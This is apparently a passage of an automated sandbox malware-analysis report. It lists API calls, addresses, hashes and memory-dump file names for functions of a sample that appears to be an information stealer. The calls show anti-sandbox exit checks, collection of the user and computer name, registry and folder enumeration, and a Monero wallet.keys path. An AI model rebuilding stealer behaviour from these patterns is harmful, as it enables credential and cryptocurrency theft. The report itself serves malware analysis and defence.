Part of subcall function 00041110: ExitProcess.KERNEL32 ref: 00041143

Part of subcall function 00041220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0004123E
Part of subcall function 00041220: __aulldiv.LIBCMT ref: 00041258
Part of subcall function 00041220: __aulldiv.LIBCMT ref: 00041266
Part of subcall function 00041220: ExitProcess.KERNEL32 ref: 00041294

Part of subcall function 00056770: GetUserDefaultLangID.KERNEL32 ref: 00056774

Part of subcall function 00041190: ExitProcess.KERNEL32 ref: 000411C6

Part of subcall function 00057850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000411B7), ref: 00057880
Part of subcall function 00057850: RtlAllocateHeap.NTDLL(00000000), ref: 00057887
Part of subcall function 00057850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0005789F

Part of subcall function 000578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057910
Part of subcall function 000578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00057917
Part of subcall function 000578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0005792F

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CE8950,?,0006110C,?,00000000,?,00061110,?,00000000,00060AEF), ref: 00056ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00056AE8
CloseHandle.KERNEL32(00000000), ref: 00056AF9
Sleep.KERNEL32(00001770), ref: 00056B04
CloseHandle.KERNEL32(?,00000000,?,00CE8950,?,0006110C,?,00000000,?,00061110,?,00000000,00060AEF), ref: 00056B1A
ExitProcess.KERNEL32 ref: 00056B22

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 537e77a66e5be80b06fc8e72e2505027445e85c873fbe95320b542251462e5d9
Instruction ID: a23d63bed0927c420cc65cb3ee7919928ea8bd5dfdef7de64d8b115477a95d0d
Opcode Fuzzy Hash: 537e77a66e5be80b06fc8e72e2505027445e85c873fbe95320b542251462e5d9
Instruction Fuzzy Hash: 16313270A04108AAEB04F7F0EC5ABFF7778AF05302F404629FA02A6193EF705549C7A6

Function 000499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000499EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00049A11
LocalAlloc.KERNEL32(00000040,?), ref: 00049A31
ReadFile.KERNEL32(000000FF,?,00000000,0004148F,00000000), ref: 00049A5A
LocalFree.KERNEL32(0004148F), ref: 00049A90
CloseHandle.KERNEL32(000000FF), ref: 00049A9A

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 367b6db37d3d52a95382aba8cf8630c33c87aaca9be44b413b844a5bc46a6d5f
Instruction ID: 66508a5071afebf94cb52ab5868070346006b343937c0702682ea2c9dc02faaf
Opcode Fuzzy Hash: 367b6db37d3d52a95382aba8cf8630c33c87aaca9be44b413b844a5bc46a6d5f
Instruction Fuzzy Hash: 71312DB4A00209EFDB14CF94D889BAE77F5FF48300F108168E901A7290DB74A951CFA6

Function 00054780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00CEE7B8), ref: 000547DB

Part of subcall function 00058DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

lstrcat.KERNEL32(?,00000000), ref: 00054801
lstrcat.KERNEL32(?,?), ref: 00054820
lstrcat.KERNEL32(?,?), ref: 00054834
lstrcat.KERNEL32(?,00CDAEE8), ref: 00054847
lstrcat.KERNEL32(?,?), ref: 0005485B
lstrcat.KERNEL32(?,00CED570), ref: 0005486F

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 00058D90: GetFileAttributesA.KERNEL32(00000000,?,00041B54,?,?,0006564C,?,?,00060E1F), ref: 00058D9F

Part of subcall function 00054570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00054580
Part of subcall function 00054570: RtlAllocateHeap.NTDLL(00000000), ref: 00054587
Part of subcall function 00054570: wsprintfA.USER32 ref: 000545A6
Part of subcall function 00054570: FindFirstFileA.KERNEL32(?,?), ref: 000545BD

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 600b5de527df214e3018e83a55ec7da26ccfefde1b168533fcc88f547557f34c
Instruction ID: c315f28f71f71bb8f7f06380c50107b84aec08179f36241db5761fe12e706357
Opcode Fuzzy Hash: 600b5de527df214e3018e83a55ec7da26ccfefde1b168533fcc88f547557f34c
Instruction Fuzzy Hash: 3A3177B690020897DB10F7B0DC89EEE737CBB58701F444599FB15A6082EE74978DCBA5

Function 00041220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0004123E
__aulldiv.LIBCMT ref: 00041258
__aulldiv.LIBCMT ref: 00041266
ExitProcess.KERNEL32 ref: 00041294

Strings

@, xrefs: 00041233

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e5966609998ee465ec3d7cc271ee2a01ae87d4fc2dc6a9131dbbc10309039947
Instruction ID: d5ec5c78f595537c859e2ef848032ca3230419a77e63bd39bfeba83969566980
Opcode Fuzzy Hash: e5966609998ee465ec3d7cc271ee2a01ae87d4fc2dc6a9131dbbc10309039947
Instruction Fuzzy Hash: 0F0162F0D44308BAEB10DBD0DD49BDEB778AB04701F208055E705F61C1D7B45585875D

Function 000540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00CED3B0,00000000,00020119,?), ref: 000540F4
RegQueryValueExA.ADVAPI32(?,00CEE908,00000000,00000000,00000000,000000FF), ref: 00054118
RegCloseKey.ADVAPI32(?), ref: 00054122
lstrcat.KERNEL32(?,00000000), ref: 00054147
lstrcat.KERNEL32(?,00CEE938), ref: 0005415B

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 9052b9d6789ff4d252ac4b90a7d170b98e609cd30f971a7e956f044046a74630
Instruction ID: e679d9c4ae2ba529f30348703f7e3776de8d7ae2ac6594bf2fa4dfe6079854e5
Opcode Fuzzy Hash: 9052b9d6789ff4d252ac4b90a7d170b98e609cd30f971a7e956f044046a74630
Instruction Fuzzy Hash: 00418BB6D10108ABDB14EBA0EC4AFFE737DAB48300F404559BB1557182EE755B8C8BE2

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 00057E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057E37
RtlAllocateHeap.NTDLL(00000000), ref: 00057E3E
RegOpenKeyExA.KERNEL32(80000002,00CDB6D0,00000000,00020119,?), ref: 00057E5E
RegQueryValueExA.KERNEL32(?,00CED590,00000000,00000000,000000FF,000000FF), ref: 00057E7F
RegCloseKey.ADVAPI32(?), ref: 00057E92

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 75e1b39bbfe2e45f886a21b633c76984fde9de2d0435f18ef2dbd6e158d7bb82
Instruction ID: ed42dc724369ffc62919ced2adf0f35b8dac48b567a226995844b2f79d966715
Opcode Fuzzy Hash: 75e1b39bbfe2e45f886a21b633c76984fde9de2d0435f18ef2dbd6e158d7bb82
Instruction Fuzzy Hash: 8B1151B5A45205EBE710CF94ED4AF7FBBB8FB08711F10415AFA09A7280DB7458049BA2

Function 000412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000412B4
RtlAllocateHeap.NTDLL(00000000), ref: 000412BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 000412D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000412F5
RegCloseKey.ADVAPI32(?), ref: 000412FF

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
